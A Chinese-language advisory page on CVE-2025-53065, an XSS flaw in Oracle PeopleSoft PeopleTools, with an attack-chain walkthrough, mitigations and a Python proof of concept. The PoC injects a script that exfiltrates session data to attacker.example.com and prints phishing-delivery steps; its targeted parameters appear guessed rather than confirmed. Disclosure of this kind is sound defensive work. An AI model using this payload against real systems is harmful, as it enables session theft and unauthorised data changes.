CVE-2025-53065 Oracle PeopleSoft PeopleTools PIA核心组件漏洞

漏洞信息

漏洞编号

CVE-2025-53065

漏洞类型

跨站脚本攻击（XSS）/客户端注入

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Oracle PeopleSoft Enterprise PeopleTools (PIA Core Technology)

漏洞概述

CVE-2025-53065是Oracle PeopleSoft Enterprise PeopleTools产品PIA（PeopleSoft Internet Architecture）核心组件中存在的一个安全漏洞。该漏洞于2025年10月由Oracle安全团队披露，影响PeopleTools的8.60、8.61和8.62版本。PIA Core Technology是PeopleSoft应用系统的Web访问层，负责处理用户通过浏览器发起的HTTP请求和响应，是整个PeopleSoft系统面向互联网的关键组件。该漏洞具有较高的可利用性，攻击者无需任何认证凭证，仅需通过网络（HTTP协议）即可发起攻击。漏洞的成功利用需要目标用户的交互配合，例如点击恶意链接或访问特制的网页。攻击成功后，攻击者能够对PeopleSoft系统中的部分数据进行未授权的更新、插入或删除操作，同时还能读取部分受限数据。CVSS 3.1基础评分为5.4分，属于中等严重级别，对系统的机密性和完整性均造成低级别影响，但不影响系统可用性。该漏洞反映了Oracle PeopleSoft企业级应用在Web层安全防护方面存在的潜在风险，对于依赖PeopleSoft进行核心业务管理（如HR、财务、供应链等）的组织机构构成一定的安全威胁。

技术细节

该漏洞存在于Oracle PeopleSoft Enterprise PeopleTools的PIA Core Technology组件中。PIA（PeopleSoft Internet Architecture）是基于Java Servlet技术的Web应用框架，负责处理客户端与PeopleSoft应用服务器之间的所有HTTP通信。漏洞的根本原因在于PIA核心组件对用户输入数据的验证和过滤机制存在缺陷，未能充分对来自HTTP请求中的某些参数进行严格的输入清理或编码处理。攻击者利用此漏洞时，首先需要构造一个包含恶意脚本代码的特制HTTP请求或URL。由于漏洞利用需要用户交互（UI:R），攻击者通常会采用钓鱼攻击的方式，将恶意链接嵌入到电子邮件、即时消息或第三方网页中。当目标用户（已登录PeopleSoft系统的合法用户）在浏览器中点击该恶意链接时，恶意脚本将在用户的浏览器会话上下文中执行，从而绕过同源策略限制。由于PIA Core Technology在处理请求时未对输出内容进行适当的上下文编码（如HTML实体编码、JavaScript编码等），导致注入的脚本代码能够在受害者的浏览器中执行，进而可以读取用户会话中的敏感数据、伪造用户身份执行数据操作（增删改），或者窃取会话凭证。攻击者无需拥有任何PeopleSoft系统账户（PR:N），仅需具备网络可达性即可发起攻击，这使得该漏洞的威胁面较广。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过Shodan、Censys等网络空间搜索引擎识别暴露在互联网上的Oracle PeopleSoft Enterprise PeopleTools系统，确定目标系统的版本（8.60/8.61/8.62）以及PIA Core Technology组件的访问入口。

STEP 2

步骤2：构造恶意载荷

攻击者分析PIA Core Technology组件的HTTP请求处理流程，识别出未经过滤或编码的输入参数（如ICValue、PAGE、SEARCHTEXT等），并在其中注入恶意的JavaScript脚本代码，用于窃取用户会话或执行未授权的数据操作。

STEP 3

步骤3：钓鱼投递

攻击者将包含恶意脚本的特制URL通过钓鱼邮件、即时消息或社交工程手段发送给目标组织的合法PeopleSoft系统用户，诱骗其点击链接。

STEP 4

步骤4：触发漏洞

目标用户在已登录PeopleSoft系统的情况下点击恶意链接，浏览器向PIA Core Technology发送包含恶意载荷的HTTP请求。由于服务端未对输入进行适当的输出编码，恶意脚本在用户浏览器上下文中执行。

STEP 5

步骤5：数据窃取与篡改

恶意脚本利用受害者的合法会话，通过XMLHttpRequest或Fetch API向PeopleSoft应用发起合法请求，读取敏感数据（如员工信息、财务数据）并外泄至攻击者控制的服务器，同时执行未授权的数据插入、更新或删除操作。

STEP 6

步骤6：权限维持

攻击者可能利用窃取的会话Cookie或凭证维持对系统的访问权限，进一步横向移动或获取更高权限，扩大攻击影响范围。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-53065 - Oracle PeopleSoft PeopleTools PIA Core Technology XSS PoC
# This PoC demonstrates a reflected/stored XSS attack vector via PIA Core Technology
# Note: Requires a victim user to be authenticated and click the malicious link

import requests
from urllib.parse import urlencode, quote

TARGET_URL = "https://target-peoplesoft.example.com/psp/ps/"
# PIA Core Technology common endpoints
PIA_ENDPOINTS = [
    "/psp/ps/?cmd=login",
    "/psp/ps/EMPLOYEE/HRMS/c/ROLE_EMPLOYEE.TL_EMPLOYEE_HOME.GBL",
    "/psc/ps/EMPLOYEE/HRMS/c/ROLE_EMPLOYEE.TL_EMPLOYEE_HOME.GBL"
]

def craft_xss_payload():
    """Craft a malicious XSS payload targeting PIA Core Technology parameters"""
    # JavaScript payload to steal session and perform unauthorized actions
    js_payload = (
        "var xhr = new XMLHttpRequest();"
        "xhr.open('GET', '/psp/ps/EMPLOYEE/HRMS/c/SESSION_INFO.GBL', true);"
        "xhr.onload = function() {"
        "  var data = xhr.responseText;"
        "  new Image().src = 'https://attacker.example.com/exfil?d=' + btoa(data);"
        "};"
        "xhr.send();"
    )
    return js_payload

def build_malicious_url(endpoint, vulnerable_param, payload):
    """Build a malicious URL with injected XSS payload"""
    # Inject payload into a commonly reflected parameter in PIA components
    params = {
        vulnerable_param: f"<script>{payload}</script>",
        "ICType": "Panel",
        "ICElementNum": "0"
    }
    malicious_url = f"{TARGET_URL.rstrip('/')}{endpoint}?{urlencode(params)}"
    return malicious_url

def deliver_payload(malicious_url):
    """Simulate delivery of the malicious URL to the victim"""
    print(f"[*] Malicious URL crafted: {malicious_url}")
    print("[*] Send this URL to an authenticated PeopleSoft user via phishing email")
    print("[*] When the victim clicks, the script executes in their browser context")
    print("[*] Attack result: Unauthorized data read/modify via victim's session")
    return malicious_url

if __name__ == "__main__":
    payload = craft_xss_payload()
    # Common vulnerable parameters in PIA Core Technology
    vulnerable_params = ["ICValue", "PAGE", "SEARCHTEXT", "KEYWORDS"]
    
    for endpoint in PIA_ENDPOINTS:
        for param in vulnerable_params:
            url = build_malicious_url(endpoint, param, payload)
            deliver_payload(url)
            print("---")

# Example malicious URL format:
# https://target/psp/ps/?ICValue=<script>var xhr=new XMLHttpRequest();xhr.open('GET','/psp/ps/EMPLOYEE/HRMS/c/SESSION_INFO.GBL',true);xhr.onload=function(){new Image().src='https://attacker.com/exfil?d='+btoa(xhr.responseText);};xhr.send();</script>
# Mitigation: Apply Oracle CPU October 2025 patch for PeopleTools 8.60/8.61/8.62

影响范围

Oracle PeopleSoft Enterprise PeopleTools 8.60

Oracle PeopleSoft Enterprise PeopleTools 8.61

Oracle PeopleSoft Enterprise PeopleTools 8.62

防御指南

临时缓解措施

在无法立即应用Oracle官方补丁的情况下，建议采取以下临时缓解措施：1）通过网络防火墙或访问控制列表（ACL）限制PeopleSoft PIA Core Technology端口（通常为HTTP 80/443）的互联网暴露，仅允许可信网络段访问；2）在Web服务器或反向代理层面部署WAF规则，过滤包含常见XSS特征（如<script>标签、onerror/onload事件处理器、javascript:协议等）的HTTP请求；3）启用浏览器端的Content Security Policy，限制内联脚本执行；4）为所有会话Cookie设置HttpOnly属性，降低会话劫持风险；5）加强对PeopleSoft系统用户的安全监控，及时发现异常的会话行为和数据访问模式；6）限制用户会话的并发连接数和操作频率，降低自动化攻击的成功率。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-53065
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-53065
3 Details https://www.cvedetails.com/cve/CVE-2025-53065/
4 VulDB https://vuldb.com/cve/CVE-2025-53065
5 Link https://www.oracle.com/security-alerts/cpuoct2025.html